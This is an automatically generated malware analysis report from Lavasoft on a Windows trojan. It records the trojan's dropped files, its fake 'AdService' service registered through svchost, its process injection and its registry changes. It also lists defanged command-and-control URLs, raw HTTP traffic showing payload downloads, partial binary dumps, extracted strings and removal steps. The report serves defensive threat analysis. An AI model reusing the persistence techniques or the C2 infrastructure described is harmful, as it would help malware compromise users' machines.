Trojan.Win32.FlyStudio_8a04d8230f

by malwarelabrobot on July 19th, 2017 in Malware Descriptions.

Gen:Variant.Razy.191688 (BitDefender), Trojan:Win32/Aenjaris!rfn (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader25.6125 (DrWeb), Gen:Variant.Razy.191688 (B) (Emsisoft), Trojan-FNDE!8A04D8230FB3 (McAfee), Trojan.Gen (Symantec), Trojan.Win32.Agent (Ikarus), Gen:Variant.Razy.191688 (FSecure), Win32:Dropper-gen [Drp] (AVG), Win32:Dropper-gen [Drp] (Avast), TROJ_GEN.R08NC0DGC17 (TrendMicro), Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 8a04d8230fb3539b678b4e99fbe1e23d
SHA1: 37d429c2b93aa9d6049ac074d08f2bd48b74895d
SHA256: e42cc205c362a73e9df7eb604455ef60ed484140e24cc7eb16fcd870a9203267
SSDeep: 6144:syBaOyfxYp6i6SOgR75v9kkJce8HCKAONqsplsd wa:781axHR75V/JoCKnq1 wa
Size: 341008 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-06 07:31:43
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:268

The Trojan injects its code into the following process(es):

tip.exe:2700

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\tip[1].bin (43644 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (120904 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (29481 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dll_service[1].bin (158158 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ip[1] (71 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\report[1].txt (242 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\report[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ip[1] (0 bytes)

Registry activity

The process tip.exe:2700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@AE19.tmp,"

The process %original file name%.exe:268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\8a04d8230fb3539b678b4e99fbe1e23d_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"AdServiceGroup" = "AdService"

[HKLM\System\CurrentControlSet\services\AdService]
"Description" = "AdService"

[HKLM\SOFTWARE\Microsoft\Tracing\8a04d8230fb3539b678b4e99fbe1e23d_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\8a04d8230fb3539b678b4e99fbe1e23d_RASAPI32]
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\8a04d8230fb3539b678b4e99fbe1e23d_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\8a04d8230fb3539b678b4e99fbe1e23d_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\8a04d8230fb3539b678b4e99fbe1e23d_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\8a04d8230fb3539b678b4e99fbe1e23d_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\System\CurrentControlSet\services\AdService\Parameters]
"ServiceDll" = "C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
9873ea6da234c2a16383b520b71df69e c:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\tip[1].bin
9873ea6da234c2a16383b520b71df69e c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dll_service[1].bin
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@AE19.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 241907 242176 4.55871 96bec2e84a745245e52b71231fa54283
.rdata 249856 77270 77312 3.73978 8319409a73259a03b7c7bfe2241bdd43
.data 327680 9556 6144 2.75261 2521505c8394a761a047c2506594609e
.tls 339968 9 512 0.014135 1f354d76203061bfdd5a53dae48d5435
.rsrc 344064 488 512 3.30772 ab97e96c261ed292d805baa37d7ec5bb
.reloc 348160 12860 13312 4.49832 b1cea0df948ac05c8887e3c2b6722ff8

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/report
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/dll_service.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/tip.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/list 108.61.212.148
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/ip
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/send 108.61.212.148
hxxp://api.knsdknknndnfjenkjwwlekfj.com/api/list 108.61.212.148


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /api/report HTTP/1.1
Server: Jtwd9ATUckjtTtKOxNwdaO1O9uap1OR4Rt1pYtWO0UTxYAIxox8kjUVuRAVxIuLOYt8t1dWOjtWdCNWd0UVpRxgdwd9AJkIN0kKOluoOQubuYUQNb4R4KO9OCpFUU4LdpAVpVpIx8SopVxTSmOop1urdTumdEtLdFkIxgOVOTdoxaSau1u0pttWpouWdVSO4buDxbu1NbN1UwdmxKOiNgNgkCtgA1494bdIubduildVdbulN
Server-Key: xuOdSpEFUtAkN4XvnGPf3iHhqB5yZ2zsKwRb7YjC08c6DQrgLTao1VIW9MmlJe
User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 242
Content-Type: text/plain; charset=Windows-1252
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: BeKfb7Vmz4ZUlIJQOCgcL6a2oqTXMkE91RF0hjHdw8YDxsptPvyiW5NnGru3SA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 18 Jul 2017 15:55:38 GMT
[DATA]BeKfb7Vmz4ZUlIJQOCgcL6a2oqTXMkEfzSzzzbzNBSzOzSzPBSzOzSzHzSzzzbzn
zbzrzSzPBSzyzSz5BSzHzSzuzbzzzbzczSzHzSz5BSz5BSzPBSzGBSzHzSzzzbznzbzzzb
zozSzPzSz3zSzyzSzVzSzxzSzPBSzOzSzHzSzvBbzozSzPBSzOzSzPBSzzzbzdzCz91RF0
hjHdw8YDxsptPvyiW5NnGru3SA[DATA]HTTP/1.1 200 OK..Cache-Control: no-cac
he..Pragma: no-cache..Content-Length: 242..Content-Type: text/plain; c
harset=Windows-1252..Expires: -1..Server: Microsoft-IIS/8.5..Server-Ke
y: BeKfb7Vmz4ZUlIJQOCgcL6a2oqTXMkE91RF0hjHdw8YDxsptPvyiW5NnGru3SA..X-A
spNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Tue, 18 Jul 201
7 15:55:38 GMT..[DATA]BeKfb7Vmz4ZUlIJQOCgcL6a2oqTXMkEfzSzzzbzNBSzOzSzP
BSzOzSzHzSzzzbznzbzrzSzPBSzyzSz5BSzHzSzuzbzzzbzczSzHzSz5BSz5BSzPBSzGBS
zHzSzzzbznzbzzzbzozSzPzSz3zSzyzSzVzSzxzSzPBSzOzSzHzSzvBbzozSzPBSzOzSzP
BSzzzbzdzCz91RF0hjHdw8YDxsptPvyiW5NnGru3SA[DATA]....


GET /api/ip HTTP/1.1


User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 18 Jul 2017 15:55:50 GMT
Content-Length: 71
{"ip":"194.242.96.218","iso_code":"UA","en":"Ukraine","cn":"........."
}..



GET /dll_service.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 26 Jun 2017 04:42:22 GMT
Accept-Ranges: bytes
ETag: "f440eb9936eed21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Tue, 18 Jul 2017 15:55:38 GMT
Content-Length: 978432
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
.....o.......o..-....o......#.......#.......#.........d.........y.....
......................Rich....................PE..L.....PY...........!
.....f...........0.......................................0............
@.........................0W.......W..................................
.o......8...................`...........@.............................
...............text....d.......f.................. ..`.rdata..........
.....j..............@..@.data...x:...p...(...T..............@....tls..
...............|..............@....reloc...o.......p...~..............
@..B..................................................................
......................................................................
......................................................................
......................................................................
.............................................P....fJ..h.r....`........
.d.........P.........Y......................&J..h.r...................
...........c...Y.......................I..h.r.........................
.....#...Y.......................I..h.r...............................
...Y......................fI..j.h ....................................
J1..h.s.......Y......................I..j.h$..........................
...........0..h s...B...Y................ .....H..j.h,.... .....0.....
....4......... ......0..h@s.......Y................8....vH..j.h0..
<<< skipped >>>

GET /tip.bin HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 22 Jun 2017 04:23:09 GMT
Accept-Ranges: bytes
ETag: "5b9e540febd21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Tue, 18 Jul 2017 15:55:44 GMT
Content-Length: 304640
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........;...U...U.
..U...Y...U.m.[...U..._.U.U...^...U...F...U...F...U...T...U...^...U...
_...U...U...U.).S...U.Rich..U.........................PE..L....DKY....
................. .......|............@...............................
......................................................................
......................................................................
......................UPX0....................................UPX1....
............................@....rsrc.... ..........................@.
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.08.UPX!....h./wb<.j.Y.......P..&$...m..3...U..h....j.h...j
...o..i...h.R....@......$..m..(.....@..]..m...&..}.f.E....f.E..m..}m..
...$..U.M^.Ku...\..v........e....g9"t.....h..a...`5J.Q...K.d.5h..h0...
.q...W....]...{{.w..]..t.....e. ...M..`.D.l@j.j.G.....y.....-...{(l...
.%......G......k).Z4...P..d! C...."I*C.@_.P.... *.h..$9hx.L._..u...%.=
...d..u.J.....t..g....A..t;.u.......~.....3............t..A.L&..t...p.
.....t....A. ........s.*..@... ..<$Q.E..{.W.u......QW.Y..W.......Iu
.zS[.X..7E..$W.UV...2.....H;..^<...XA....6(.....f..9..gp .v<
<<< skipped >>>


GET /api/list HTTP/1.1
User-Agent: restclient for cpp v1.0
Host: api.knsdknknndnfjenkjwwlekfj.com
Connection: Keep-Alive


HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Tue, 18 Jul 2017 15:55:49 GMT
Content-Length: 11
Bad Request..

The Trojan connects to the servers at the folowing location(s):

svchost.exe_2696:

.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385

tip.exe_2700:

`.rsrc
t$(SSh
~%UVW
u$SShe
Bv.SCv=kAv
shell32.dll
advapi32.dll
ShellExecuteA
RegOpenKeyA
RegCloseKey
\chrome.exe-start-maximized hXXps://VVV.facebook.com
hXXps://VVV.facebook.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
, #&')*)
-0-(0%()(
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
.text
`.rdata
@.data
.rsrc
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)

tip.exe_2700_rwx_00401000_000B6000:

t$(SSh
~%UVW
u$SShe
Bv.SCv=kAv
shell32.dll
advapi32.dll
ShellExecuteA
RegOpenKeyA
RegCloseKey
\chrome.exe-start-maximized hXXps://VVV.facebook.com
hXXps://VVV.facebook.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
, #&')*)
-0-(0%()(
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
.text
`.rdata
@.data
.rsrc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:268

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\tip[1].bin (43644 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (120904 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (29481 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dll_service[1].bin (158158 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ip[1] (71 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\report[1].txt (242 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now